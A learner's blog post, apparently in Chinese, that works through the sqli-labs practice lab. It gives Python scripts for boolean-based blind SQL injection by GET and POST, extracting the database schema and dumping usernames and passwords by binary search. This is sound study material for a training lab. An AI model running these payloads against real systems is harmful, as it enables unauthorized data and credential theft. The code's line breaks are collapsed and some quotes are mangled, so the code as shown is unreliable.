目錄

• 布爾盲注——GET類型
• 布爾盲注——POST注入

好家伙，昨天在buu上看到一道SQL注入的題目，賊難受，然后就果斷放棄去看大佬們寫的wp，所以成功的花了6個小時來學習這個鬼東西，可能是自己太菜了，也可能是小甲魚python看的太少了……小甲魚的python的確講的很不錯，推薦想學python的去看看。

布爾盲注——GET類型

這里是自己寫的代碼，寫的比較爛，勿噴！
話不多說，直接上代碼，看不懂來找我（算了，還是別找我了……），這里都是以sqli-labs第八關為例子的。

# 導入爬蟲模塊 import requests # 導入時間模塊 import time# 獲取數據庫的長度 def get_DBlen(url):for i in range(1,20):payload = "' and length(database())=%d -- p"%ihtml = requests.get(url + payload)if "You" in html.text:print(f"數據庫長度為：{i}")breakreturn i# 獲取數據庫的庫名 def get_DBname(url,DBlen):DBname = ""DBlen = DBlen + 1for i in range(1,DBlen):for j in range(33,128):payload = "' and (ascii(substr((select(database())),{0},1))={1}) -- p".format(i,j)db_url = url + payloadhtml = requests.get(db_url)if "You" in html.text:DBname += chr(j)breakprint(DBname)return DBname# 獲取表的長度 def get_TBlen(url):# 表示數據表的數量TBvalue = 0for j in range(0,15):payload = "' and length((select table_name from information_schema.tables where table_schema=database() limit {0},1))>1 -- p".format(j)db_url = url + payloadhtml = requests.get(db_url)# 如果有回顯說明該表存在，存在的話就可以判斷該表的長度if "You" in html.text:passelse:TBvalue = jbreak# print(TBvalue)for j in range(0,TBvalue):# print(j)：0,1,2,3for i in range(1,20):payload = "' and length((select table_name from information_schema.tables where table_schema=database() limit {0},1))={1} -- p".format(j,i)db_url = url + payloadhtml = requests.get(db_url)if "You" in html.text:print(f"數據表{j}的長度為{i}")return TBvalue# 獲取表名 def get_TBname(url,TBlen):TBnameAll = []for i in range(0,TBlen):TBname = ""for j in range(1,15):min = 32max = 128mid = (max + min) // 2while min < max:payload = "' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {0},1),{1},1))>{2} -- p".format(i,j,mid)html = requests.get(url + payload)if "You" in html.text:min = mid + 1else:max = midmid = (max + min) // 2if mid <= 32 or mid >= 127:breakTBname += chr(mid)# print(chr(mid))print(TBname)TBnameAll.append(TBname)return TBnameAll# 獲取列的列名 def get_Colname(url):for i in range(0,15):Colname = ""for j in range(1,15):min = 32max = 128mid = (min + max) // 2while min < max:payload = "' and ascii(substr((select column_name from information_schema.columns where table_name='referers' limit {0},1),{1},1))>{2} -- p".format(i,j,mid)html = requests.get(url + payload)if "You" in html.text:min = mid + 1else:max = midmid = (max + min) // 2if mid <= 32 or mid >= 127:breakColname += chr(mid)print("數據列名為：",Colname)# 爆數據 def get_shuju(url):for i in range(0,15):shuju = ""for j in range(1,20):min = 32max = 128mid = (min + max) // 2while min < max:payload = "' and ascii(substr((select concat(id,'~',email_id) from emails limit {0},1),{1},1))>{2} -- p".format(i,j,mid)html = requests.get(url + payload)if "You" in html.text:min = mid + 1else:max = midmid = (max + min) // 2if mid <= 32 or mid >= 127:breakshuju += chr(mid)print("數據為：",shuju)if __name__ == "__main__":# 要進行SQL盲注的鏈接url = "http://192.168.59.150/sqli-labs/Less-8/?id=1"# 數據庫的長度DBlen = get_DBlen(url)# 數據庫的庫名DBname = get_DBname(url,DBlen)# 數據表的個數TBlen = get_TBlen(url)# print(TBlen)# 表的表名# TBnameAll = get_TBname(url,TBlen)# 返回的是一個列表，表示所有的數據表名# print(TBnameAll)get_Colname(url)# 數據get_shuju(url)

能運行，運行結果比較多，就不截圖了。唉，寫的比較垃圾，大佬別噴。慢慢改進，好家伙……

下面是請教師傅，然后改的腳本，算80%的自動化吧，嗷嗷嗷……：

from operator import le import requests import timehost = "http://192.168.59.150/sqli-labs/Less-8/?"def getDatabase(): #獲取數據庫名# 將host變量變為一個全局變量global hostans=''for i in range(1,1000):low = 32high = 128mid = (low+high)//2while low < high:time.sleep(0.3)url = host + "id=1' and (ascii(substr((select(database())),%d,1))<%d) -- p" % (i,mid)res = requests.get(url)# 如果返回的是You，那么就為真的if "You" in res.text: high = midelse:low = mid + 1mid=(low + high) // 2if mid <= 32 or mid >= 127:breakans += chr(mid-1)print("database is -> "+ans)# 返回庫名return ansdef getTable(DBname): #獲取表名global hostans= ""for i in range(1,1000):low = 32high = 128mid = (low + high) // 2while low < high:time.sleep(0.3)url = host + "id=1' and (ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='{0}')),{1},1))<{2}) -- p".format(DBname,i,mid)res = requests.get(url)if "You" in res.text: high = midelse:low = mid+1mid=(low + high) // 2if mid <= 32 or mid >= 127:breakans += chr(mid - 1)print("table is -> " + ans)# 返回表名，此時表名為一個列表return ansdef getColumn(TBname): #獲取列名global hostans = ''for i in range(1,1000):low = 32high = 128mid = (low + high) // 2while low < high:time.sleep(0.3)url = host + "id=1' and (ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='{0}')),{1},1))<{2}) -- p".format(TBname,i,mid)res = requests.get(url)if "You" in res.text: high = midelse:low = mid + 1mid=(low + high) // 2if mid <= 32 or mid >= 127:breakans += chr(mid - 1)print("column is -> " + ans)# 返回一個列名return ansdef dumpTable():#脫褲global hostans=''for i in range(1,1000):low = 32high = 128mid = (low+high)//2while low < high:time.sleep(0.3)url = host + "id=1' and (ascii(substr((select(group_concat(username,password))from(users)),%d,1))<%d) -- p" % (i,mid)res = requests.get(url)if "You" in res.text: high = midelse:low = mid+1mid=(low+high)//2if mid <= 32 or mid >= 127:breakans += chr(mid-1)print("dumpTable is -> "+ans)DBname = getDatabase() # print(DBname) TBname = getTable(DBname) # print(type(TBname))表示是一個字符串，用來測試 TBnames = [] TBnames.append(TBname.split(',')) # 因為輸出的是一個二元數組，所以使用下面的代碼來轉為一維數組 TBnames = TBnames[0] # print(TBnames) TBlen = len(TBnames) for i in range(0,TBlen):TBname = TBnames[i]# print(TBname)getColumn(TBname)if i == TBlen - 1:break dumpTable()

布爾盲注——POST注入

直接上代碼了：（這里是以sqli-labs第15關為例的）

import requestsimport timehost = “http://192.168.59.150/sqli-labs/Less-15/”def getDatabase(): #獲取數據庫名# 將host變量變為一個全局變量global hostans=”for i in range(1,1000):low = 32high = 128mid = (low + high) // 2while low < high:# time.sleep(0.3)payload = “admin’ and (ascii(substr((select database()),{0},1))<{1}) — p”.format(i,mid)# print(payload)# 測試data = {“uname”:payload,”passwd”:”admin”,”submit”:”Submit”}html = requests.post(host,data)# 如果返回的是有數據，那么就為真的if “flag.jpg” in html.text:high = midelse:low = mid + 1mid = (low + high) // 2if mid <= 32 or mid >= 127:breakans += chr(mid – 1)print(“database is -> ” + ans)# 返回庫名return ansdef getTable(): #獲取表名global hostans= “”for i in range(1,1000):low = 32high = 128mid = (low + high) // 2while low < high:# time.sleep(0.3)payload = “admin’ and (ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{0},1))<{1}) — p”.format(i,mid)data = {“uname”:payload,”passwd”:”admin”,”submit”:”Submit”}html = requests.post(host,data)# 如果返回的是有數據，那么就為真的if “flag.jpg” in html.text:high = midelse:low = mid+1mid=(low + high) // 2if mid <= 32 or mid >= 127:breakans += chr(mid – 1)print(“table is -> ” + ans)# 返回表名，此時表名為一個列表return ansdef getColumn(TBname): #獲取列名global hostans = ”for i in range(1,1000):low = 32high = 128mid = (low + high) // 2while low < high:time.sleep(0.3)payload = “admin’ and (ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='{0}’)),{1},1))<{2}) — p”.format(TBname,i,mid)data = {“uname”:payload,”passwd”:”admin”,”submit”:”Submit”}html = requests.post(host,data)# 如果返回的是有數據，那么就為真的if “flag.jpg” in html.text:high = midelse:low = mid + 1mid=(low + high) // 2if mid <= 32 or mid >= 127:breakans += chr(mid – 1)print(“column is -> ” + ans)# 返回一個列名return ansdef dumpTable():#脫褲global hostans=”for i in range(1,1000):low = 32high = 128mid = (low+high)//2while low < high:time.sleep(0.3)payload = “admin’ and (ascii(substr((select(group_concat(username,password))from(users)),%d,1))<%d) — p” % (i,mid)data = {“uname”:payload,”passwd”:”admin”,”submit”:”Submit”}html = requests.post(host,data)# 如果返回的是有數據，那么就為真的if “flag.jpg” in html.text:high = midelse:low = mid+1mid=(low+high)//2if mid <= 32 or mid >= 127:breakans += chr(mid-1)print(“dumpTable is -> “+ans)if __name__ == “__main__”:# getDatabase()TBname = getTable()# print(type(TBname))表示是一個字符串，用來測試TBnames = []TBnames.append(TBname.split(‘,’))# 因為輸出的是一個二元數組，所以使用下面的代碼來轉為一維數組TBnames = TBnames[0]# print(TBnames)TBlen = len(TBnames)for i in range(0,TBlen):TBname = TBnames[i]# print(TBname)getColumn(TBname)if i == TBlen – 1:breakdumpTable()

如果有哪里寫的不好的地方，還請各位師傅指教！感謝

總結

以上是生活随笔為你收集整理的二分法实现SQL盲注的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。